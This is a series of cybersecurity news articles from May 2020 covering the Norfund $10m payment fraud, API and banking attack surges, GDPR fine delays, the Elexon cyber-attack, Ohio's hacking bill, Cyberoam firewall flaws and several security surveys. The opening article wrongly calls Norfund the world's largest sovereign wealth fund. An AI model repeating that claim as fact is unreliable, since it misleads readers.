Norfund is a private equity company established by the Norwegian Storting in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget and is the largest sovereign wealth fund in the world. 

On May 13, Norfund announced that it was "cooperating closely with the police and other relevant authorities" after "a series of events" allowed fraudsters to make off with $10m. 

The fund said that a data breach allowed defrauders to access information concerning a loan of US$10m from Norfund to a microfinance institution in Cambodia. 

Using a mixture of manipulated data and falsified information, the fraudsters managed to impersonate the borrowing institution and divert funds away from the genuine recipient and into their own pockets. 

"The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified," said a Norfund spokesperson.

Funds were diverted to an account in Mexico under the same name as the Cambodian microfinance institution. The theft took place on March 16 but went undetected until April 30, when the scammers attempted to fraudulently obtain more money. 

“This is a very unfortunate situation," said Olaug Svara, chair of the board of directors. "We now have to get a full overview of the chain of events in order to get to the bottom of this."

Norfund's board has engaged PwC to undertake a full review of the company's security systems and routines.

Norfund CEO Tellef Thorleifsson said: "The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this.”

Commenting on how the fraud might have been committed, Chris Hazelton, director of security solutions at Lookout, said: “There is no specific information on how this attack took place, nevertheless, how the threat actors were able to 'manipulate the communication between Norfund and the intended recipient' points to either BEC or phishing as a likely entry point for attackers."

API Attacks Increase During Lockdown

API Attacks Increase During Lockdown

Cyber-attacks against API endpoints have increased since lockdown measures were introduced to slow the spread of COVID-19.

Threat research published today by California cybersecurity software company Cequence noted a huge spike in malicious traffic since April, with API endpoints being targeted far more than usual. 

Describing the number of threats leveled at just one of their customers, Cequence researchers saw malicious traffic increase by 40% to 28 million events over the week commencing April 17. As time marched forward, the volume of attacks rose. 

"Week of April 23rd saw a massive spike of 279% to 78M with one attack campaign peaking at 100,000 requests per minute," noted researchers. "Week of May 1st showed yet another increase in malicious traffic to 139M requests or an 85% week over week increase."

Attackers were found to be directing the lion's share of traffic at one login API endpoint for the Android application. 

Asked why this particular API received a battering, CQ Threat Research team member and hacker in residence Jason Kent told Infosecurity Magazine: "Usually this is because an attack worked once against that endpoint. Often the focus API endpoint is old, learned either several months ago, or the attacker assumes the older endpoints are forgotten (often the case) and not monitored. 

"Additionally, it is much easier to decompose the API calls an application makes from Android because there are several tools to help with this, versus iOS, which is a bit more difficult."

According to Kent, the biggest trend observed in attacks instigated since "stay safe" became a standard email sign-off has been a growth in overall volume. He added that the tactics around volume, source IPs, and User-Agents (device type) have increased significantly. 

"Attackers are obviously focused on account takeover and are clearly trying to get past mitigation efforts: traffic is being distributed across approximately 1 million residential IP addresses from 15,000 different organizations owned by Bulletproof Proxy vendors, and they are rotating 3 million user agents," said Kent. 

"The heavy use of residential IP addresses, combined with Covid-19 driven stay-at-home orders, makes separating out malicious traffic from legitimate traffic even more important.  The attackers know if they can use residential IP addresses from Bulletproof Proxy Networks, they’ll be that much harder to catch and defend against."

AI and Machine Learning Critical to Tackling Cyber Threats Say NTT

AI and Machine Learning Critical to Tackling Cyber Threats Say NTT

Advanced artificial intelligence (AI) and machine learning tools are becoming increasingly critical in detecting and combatting cyber threats. This is according to Stefaan Hinderyckx, Senior Vice President, Security - Europe at NTT Ltd. speaking at the virtual NTT European Digital Press Roundtable 2020 on May 13 2020.

According to Hinderyckx, with organizations now handling so much data, coupled with a current shortage of cybersecurity experts, identifying security threats efficiently and quickly is only possible using these technologies.

He said the global technology services company gets around 280 billion logs per month across all its clients; these can be reduced to 1000 possible threats through its automated AI and machine learning tools, which utilize complex mathematical techniques such as pattern matching and advanced correlation. NTT’s analysts can then focus on investigating these potential threats closely.

“We have this massive haystack and we put that into a manageable number of incidents that analysts can still look at,” commented Hinderyckx. “You still need humans; machine learning and AI cannot completely replace our analysts, but you can simply do it much more efficiently and the need for speed of course is there because you can’t wait for five hours from the logs coming in and flagging the alert, it has to be near real-time.”

Hinderyckx also stated how these technologies are also able to pick up new threats that conventional security analysis techniques, such as security information and event management (SIEM), find difficult to identify. He gave the example of the emerging threat of zero day exploits. “By using AI we’re effectively addressing the white space,” he added.

Attacks on Banks Spike 238% During #COVID19 Crisis

Attacks on Banks Spike 238% During #COVID19 Crisis

Attacks on financial institutions spiked by a massive 238% from the beginning of February to the end of April, as cyber-criminals took advantage of peaks in the COVID-19 news cycle, according to VMware Carbon Black.

The company’s third annual Modern Bank Heists report revealed that over a quarter (27%) of attacks so far this year have targeted either the healthcare or financial sectors.

Interestingly, rises in attack volumes seem to have coincided with major news events during the crisis, such as the first confirmed US case, the country’s first death, and the WHO declaring a pandemic. This could be because such events provide a useful lure for phishing emails.

Ransomware attacks against the financial sector increased nine-fold from the beginning of February to the end of April 2020.

Elsewhere, Emotet and Kryptik malware variants were among the most prolific, the latter used in the notorious 2015 attack on Ukrainian power grid. Aside from ransomware, the end goal is to transfer funds or exfiltrate sensitive data.

In fact, 82% of respondents claimed that attacks had become more sophisticated over the past year. Attackers have “dramatically increased” their understanding of internal policies and procedures and are aware of blind spots in incident response, the report claimed.

A third (33%) of respondents said they’d been hit by island hopping attacks via smaller supply chain partners, and a fifth (20%) had experienced a watering hole attack.

Of even greater concern is that a quarter (25%) said they’d been targeted by destructive attacks designed to cause maximum damage rather than to elicit a ransom payment.

“Over the years, bank heists have escalated to virtual hostage situations where cybercrime groups and nation-states have attempted to commandeer digital transformation efforts,” argued VMware’s head of security strategy, Tom Kellermann. “Now, as we address COVID-19’s impact on a global scale, it’s clear attackers are putting financial institutions directly in their crosshairs, according to our data.”

According to Accenture, the cost to address and contain cyber-attacks is higher for financial services than any other sector.

ICO’s BA and Marriott Fines Likely to Be Pushed Back Again

ICO’s BA and Marriott Fines Likely to Be Pushed Back Again

Legal experts have warned of more potential delays to the official GDPR fines set to be handed down to British Airways and Marriott International, potentially undermining the authority of the UK regulator.

The Information Commissioner’s Office (ICO), Europe’s largest data protection regulator by budget and employees, originally handed down a notice of intent to fine BA a massive £183.4 million fine after a Magecart-related breach on its site. A £99 million fine was slated for the hotel group soon after for its breach of 339 million customer records.

Although these were first published in July 2019, they’ve been subject to delays as the companies involved made detailed representations to the regulator.

The initial six-month period from notice of intent to fine was extended to May 2020, according to BA’s recent annual report.

However, experts at Cordery Compliance now believe the deadline will be pushed back again due to COVID-19, to around August-September time.

“Our understanding is that whilst still emphasizing the seriousness of the breaches, the ICO will apply a lenient approach to the amount of the fines due to the financial impact of COVID-19,” the compliance firm added in an alert.

This is likely to raise questions about the ability and resolve of the ICO to bring large cases against well-funded corporations.

“Although the impact of COVID-19 may explain some of the current continued delay, quite why what may end up being over a year to resolve these matters since the ICO announced its intentions to fine may leave some wondering whether GDPR enforcement is going as quickly as it should,” said Cordery.

“In addition, what was also expected to be a showcase for the first significant fines under GDPR in the UK may now be a let-down.”

That said, the two companies are still facing the prospect of potentially costly litigation from disgruntled customers, it added.

A report out last month argued that Europe’s GDPR regulators are woefully under-resourced financially and lacking in the in-house technical expertise needed to take on the major technology firms.

UK Power Grid Biz Suffers Outage After Cyber-Attack

UK Power Grid Biz Suffers Outage After Cyber-Attack

A UK power grid company has suffered a possible ransomware attack, although electricity supply to homes has not been affected.

Elexon administers a crucial part of the power supply chain, known as the Balancing and Settlement Code (BSC), with customers including the country’s suppliers, generators, distributors, traders, and energy importers and exporters.

The firm takes over one million meter readings everyday to compare what generators and suppliers say they will produce or consume with actual volumes, before calculating a price for the difference and transferring funds accordingly.

At nearly midday local time yesterday the firm posted an alert claiming its internal IT systems had been impacted by a cyber-attack.

“BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only. We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails,” the notice read.

A further message nearly four hours later revealed that the firm had “identified the root cause and we are taking steps to restore our internal IT systems.”

The National Grid took to Twitter to reassure customers about electricity supply.

“We’re aware of a cyber-attack on Elexon’s internal IT systems,” it noted. “We’re investigating any potential impact on our own IT networks. Electricity supply is not affected. We have robust cybersecurity measures across our IT and operational infrastructure to protect against cyber-threats.”

Although yet to be confirmed, the downtime to internal systems would seem to suggest a ransomware attack, although there are other possibilities.

The power grid, like other parts of critical national infrastructure (CNI), has come under increasing scrutiny from nation state actors in recent years, especially Kremlin-backed hackers.

Back in 2017, NCSC boss Ciaran Martin warned of Russian attacks on UK media, telecoms and energy sectors as part of its bid to “undermine the international system.”

Earlier this month Donald Trump declared a national emergency over the threat of foreign adversaries launching crippling cyber-attacks against the US power grid.

Ohio Votes to Outlaw Attempted Hacks

Ohio Votes to Outlaw Attempted Hacks

The Ohio House of Representatives has voted through new legislation that will criminalize all malicious hacking attempts, whether they succeed or not. 

Backers of House Bill 368 say changes are necessary as currently only malicious computer hacks that succeed are punishable under Ohio law.  

House Bill 368 was passed yesterday with a vote of 93–1, with the lone "nay" cast by state Representative Tavia Galonski. 

If approved by the Senate, the new law will prohibit a person from gaining access to, attempting to gain access to, or causing access to be gained to a computer, computer system, or computer network when certain conditions apply. 

Ethical hackers, such as those hired to test a company's cybersecurity, would not be punishable under the new law, even if they were to accidentally access data that they were not supposed to.

The legislation also proposes making penalties for offenders convicted of computer trespass harsher if they are found to have acted recklessly or if they have deliberately targeted elderly or disabled users. 

Under the new bill, victims of cybercrime would be permitted to file a civil lawsuit pursuing compensation from offenders convicted of cyber-offenses. 

Currently, Ohio only has two categories of offense covering computer crimes: criminal mischief and unauthorized use of a computer. The new legislation would update and expand these offenses with several new felony-level offenses.

Electronic data tampering and electronic data manipulation, electronic data theft, unauthorized data disclosure, electronic computer service interference, and computer trespass are among the new felony-level offenses. 

The bill was sponsored by state Representative Brian Baldridge. Speaking in support of the bill on the House floor yesterday, state Representative David Leland said: “It really corrects some glaring holes in our criminal statute related to cybersecurity."

Leland added that the newly proposed offenses would penalize crimes such as a recent attempt by an unknown malicious hacker to partially take down Ohio’s unemployment benefits website. 

The website is used by employers to report workers who have quit or refused to work during the COVID-19 pandemic, putting them at risk of losing their unemployment benefits.

Critical Flaws Found in Cyberoam Security Devices

Critical Flaws Found in Cyberoam Security Devices

Critical flaws have been discovered in a cybersecurity company's next-generation firewall and VPN technology.

Researchers at vpnMentor detected two vulnerabilities in cybersecurity devices developed by Cyberoam Technologies. Founded in 1999, Ahmedabad-based company Cyberoam was bought by British security software and hardware company Sophos Group plc in 2014.

Cyberoam employs 550 people globally and serves 65,000 users in over 120 countries, offering security solutions to “global corporations in the manufacturing, healthcare, finance, retail, IT sectors, and more, in addition to educational institutions, public sector and large government organizations.”

The first vulnerability was found in the FirewallOS of Cyberoam SSL VPNs in the last quarter of 2019, while the second was shared with vpnMentor by an anonymous ethical hacker at the beginning of 2020 and verified at vpnMentor's Research Lab.

"After confirming their findings, our team discovered a third flaw, which had also gone unnoticed," wrote researchers.

"These vulnerabilities, both independently and when put together, could have been potentially exploited by sending a malicious request, which would enable an unauthenticated, remote attacker to execute arbitrary commands."

Cyberoam software works by forming a gateway that blocks unauthorized access to a network. Researchers revealed that the main flaw in Cyberoam’s security involved two separate weaknesses in how an email is "released from quarantine" on a Cyberoam device.

"Both unrelated issues could have been used to give hackers access to Cyberoam’s devices, and, as an end result, make it easier to exploit any device which their firewalls were guarding," wrote researchers. 

Hotfixes have been published by Sophos to resolve the vulnerabilities, which are not the first flaws to be discovered in Cyberoam's security products. 

"For many years, people have been identifying significant weaknesses in their software products and devices," wrote researchers, before citing three specific weaknesses.

The first of these dates back to July 2012, when it was revealed that Cyberoam was using the same SSL certificate across many of its devices, making it possible for hackers to access any affected device on the company's network and intercept its data traffic.

In 2018, massive portions of Cyberoam databases were discovered for sale on the dark web after being swiped by a hacker, according to Indian media reports.

Identity Breaches at 79% of Organizations

Identity Breaches at 79% of Organizations

New research published today by the Identity Defined Security Alliance (IDSA) has revealed that 79% of organizations have experienced an identity-related security breach in the last two years.

The worrisome finding emerged from a study titled “Identity Security: A Work in Progress,” which is based on an online survey of 502 IT security and identity decision makers conducted in April. The study was carried out to identify trends in identity-related security and to deduce how forward-thinking companies are trying to reduce the risk of a breach.

Researchers found that identity-related breaches are as common as mud, with 94% of organizations experiencing this particular calamity at some point and 79% saying that a breach had occurred within the past two years. 

Of those surveyed, 99% believe that the breach they experienced was preventable, but fewer than half have fully implemented key identity-related security outcomes.

Asked for their views on how identity-related breaches typically occur, 66% of respondents identified phishing as the most common cause. The results suggested that cybersecurity training could reduce the risk of a breach.

"Phishing presents a significant challenge for security leaders—of companies breached, 71% surveyed said the attack could have been prevented through better security awareness training," wrote researchers.  

The study revealed a link between an organization's attitude to cybersecurity and how recently it had experienced a breach. Only 34% of companies with a "forward-thinking" security culture have had an identity-related breach in the past year compared with 59% of companies that foster a "reactive" security culture.

Another key difference between reactive and proactive companies was the impact of a breach. Forward-thinking companies experienced similar phishing-related breaches, but fewer stolen credentials (34% vs 42%), compromised privileged credentials (27% vs 32%), inadequately managed privileges (35% vs 40%), and socially engineered passwords (32% vs 41%).

Researchers concluded that organizations could do more to prevent future breaches. They said: "There is no doubt that with explosive growth in identities in the last five years and what is still to come, organizations are shifting strategies to protect their most vulnerable attack vector with some success. But there is more work to be done."

DWF Appoints Mark Hendry as Director of Data Protection and Cybersecurity

DWF Appoints Mark Hendry as Director of Data Protection and Cybersecurity

DWF has appointed Mark Hendry as its director of data protection and cybersecurity, joining from Deloitte where he was responsible for data protection and cybersecurity risk and remediation projects for clients.

At DWF, Hendry will work alongside the global head of data protection and cybersecurity, Stewart Room, and the wider leadership team, to develop and grow the global legal business’ cybersecurity consultancy services. He will help clients from different sectors to address their cybersecurity issues and requirements, particularly in the areas of multi-disciplinary incident response services, strategic improvement and risk remediation.

Hendry’s appointment follows a lengthy career in data protection and cybersecurity. Prior to his role at Deloitte, he worked at PwC for nine years where he held a variety of positions, including group leader for the 100+ headcount London cybersecurity and business resilience business, technology audit lead for the FTSE100 practice and leadership team member of the multi-disciplinary data protection group.

Before then, he worked for Research Machines Plc and British Telecom in client facing technical project and program management roles.

Commenting on the appointment, Room stated: “We are delighted to be welcoming Mark to DWF. He is an extremely experienced data protection and cybersecurity professional who provides DWF with an added edge in the market. Mark will be critical in advising clients across a range of sectors to address their cybersecurity issues, with a focus on incident response services, strategic improvement and risk remediation."

Hendry is the latest high profile appointment for DWF already this year, following the recruitment of James Drury-Smith as its new UK national leader of privacy and cyber security last month and Room as partner and global head of data protection and cybersecurity in February.

Hendry commented: “I am delighted to have joined DWF which is a business in prime position to serve our clients and grow with them. The combination of DWF's legal expertise and associated legal and non-legal services globally provides an incredibly powerful and united platform from which to serve our clients and markets.” 

Kaspersky Report Shows Need for Improved Password Storage

Kaspersky Report Shows Need for Improved Password Storage

More than four out of five people think up their own passwords, while 54% don’t know how to check if any of their credentials have been leaked. This is according to Kaspersky’s Defending digital privacy: taking personal protection to the next level report, which highlighted the growing need for better password storage, with people using an increasing number of online accounts.

Numerous studies have demonstrated the importance of having complex passwords that are changed regularly and differ across multiple accounts in order to prevent data breaches. Yet in this new report, 55% of users said they are able to remember all their passwords, suggesting that they do not make them sufficiently complex and unique.

The study also showed that of those who do keep a record of their passwords, many store them in places which make them vulnerable to being stolen. Of the 15,002 consumers surveyed across 23 countries, 19% stated that they store their passwords in a written file or on a computer, while 18% keep them saved on browsers their computers, smartphones, or tablets.

Kaspersky added that users should be made more aware of services such as ‘Have I Been Pwned?’ to enable them to check whether their passwords have been included in public leaks or data breaches without having to visit the dark web.

Marina Titova, head of consumer product marketing at Kaspersky, said: “Consumers can monitor the spread of personal data, including which passwords might have been leaked. And this is not only for the sake of ‘just being aware’; it also allows individuals to take the right action to minimize any invasion of privacy – along with any wider consequences. That’s why we at Kaspersky put a big focus on protecting consumer’s privacy.”

In order to minimize the risk of passwords being stolen, Kaspersky recommends that people never leave them in places where others may find them, whether written on paper or on a device.

Last week was World Password Day 2020, which promotes better password practice. This is an issue that takes on extra importance this year due to the unprecedented rise in people working from home as a result of COVID-19.

Remote Workers Often Not Provided Secure Tools

Remote Workers Often Not Provided Secure Tools

The number of employees working from home is increasing, but the security technology to support them is not being deployed.

According to a survey of 694 IT security administrators and practitioners, most companies fail to authenticate remote workers properly or inadequately inspect their network traffic for threats.

The research, conducted by Cato Networks, found 68% of respondents said their organizations fail to deploy enough prevention or authentication technologies for remote users. In particular, 37% do not use multi-factor authentication (MFA) for remote users, while 55% of respondents fail to employ intrusion prevention software, or anti-malware technology, while 11% fail to inspect traffic altogether.

“A lack of security enforcement on remote access users should be of serious concern for IT managers: enterprises cannot enable widespread remote access at the expense of security protections,” said Yishay Yovel, CMO of Cato Networks. “Enterprises should be able to provide remote access for all users anywhere, in minutes, with the security protections and network optimizations they have in the office.”

Brian Honan, CEO of BH Consulting, told Infosecurity that the numbers did not surprise him, as many companies were already struggling to roll out better authentication technologies for remote users before the global pandemic hit.

He said: “With the rush to support remote working for many more users, companies rapidly expanded their remote access solutions or migrated systems to the cloud; this rush was to ensure the business could survive and support staff to continue working.

“However, now that those immediate goals have been met and our response to the pandemic may be more long term than initially planned, companies need to review the security and resilience of their remote access solutions.”

The news follows research from earlier this week, when a Tripwire survey found 94% of cybersecurity professionals were more concerned about security in the wake of COVID-19. Its survey of 345 IT security professionals found that 89% said remote working had made the job more difficult. Additional findings included: 

  • 49% said they cannot effectively secure employees’ home office environments
  • 41% said it is more challenging to manage what devices are connecting to their corporate networks
  • 38% said it is hard to gain visibility into remote assets and systems

The survey also found that 53% of respondents were increasing security investment with 28% investing in new tools. 

“The massive shift to working remotely represents a huge change for organizations’ attack surfaces,” said Tim Erlin, vice-president of product management and strategy at Tripwire. “It’s no surprise that security professionals are finding it challenging to monitor and minimize the new attack surfaces.”


Join our webinar on 28th May at 1pm EDT/6pm BST for a discussion on working from home and network security, and the issues being created. Register here.


Microsoft OLE Bugs Most Frequently Exploited Since 2016

Microsoft OLE Bugs Most Frequently Exploited Since 2016

The US government has released new technical guidance highlighting the 10 most commonly exploited vulnerabilities of recent years, in a bid to improve awareness and patching among organizations.

It warned that “foreign cyber-actors” often choose to focus on known and often dated vulnerabilities as they require fewer resources to exploit than researching zero-days. Although the top 10 list is for flaws exploited in 2016-19, two of the featured CVEs date back even before this period, to 2012 and 2015.

“The public and private sectors could degrade some foreign cyber threats to US interests through an increased effort to patch their systems and implement programs to keep system patching up to date,” the notice urged.

“A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries’ operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.”

Microsoft’s Object Linking and Embedding (OLE) technology was most commonly targeted between 2016 and 2019, featured in the top two most exploited CVEs: CVE-2017-11882 and CVE-2017-0199. Along with OLE-related CVE-2012-0158 they comprise the three bugs most frequently used by state-sponsored attackers from China, Iran, North Korea and Russia.

Chinese attackers were also still using CVE-2012-0158 in December 2019, highlighting that organizations have yet to patch, despite the vulnerability being flagged in 2015 as a common target for Beijing-backed hackers.

As for vulnerabilities exploited so far in 2020, the report warned of attacks targeting VPN systems made by Citrix and Pulse Secure, particularly in light of the rapid shift to home working due to COVID-19.

The same vulnerabilities are also thought to have been exploited by cyber-criminals in sophisticated APT-style ransomware attacks, according to Microsoft.

“The DHS report appears to align what we are seeing in the wild,” said Edgescan CEO, Eoin Keary. “Ultimately, attackers don’t care where the vulnerability is, which is why a full-stack vulnerability management approach is advised in such a fast-changing threat landscape.”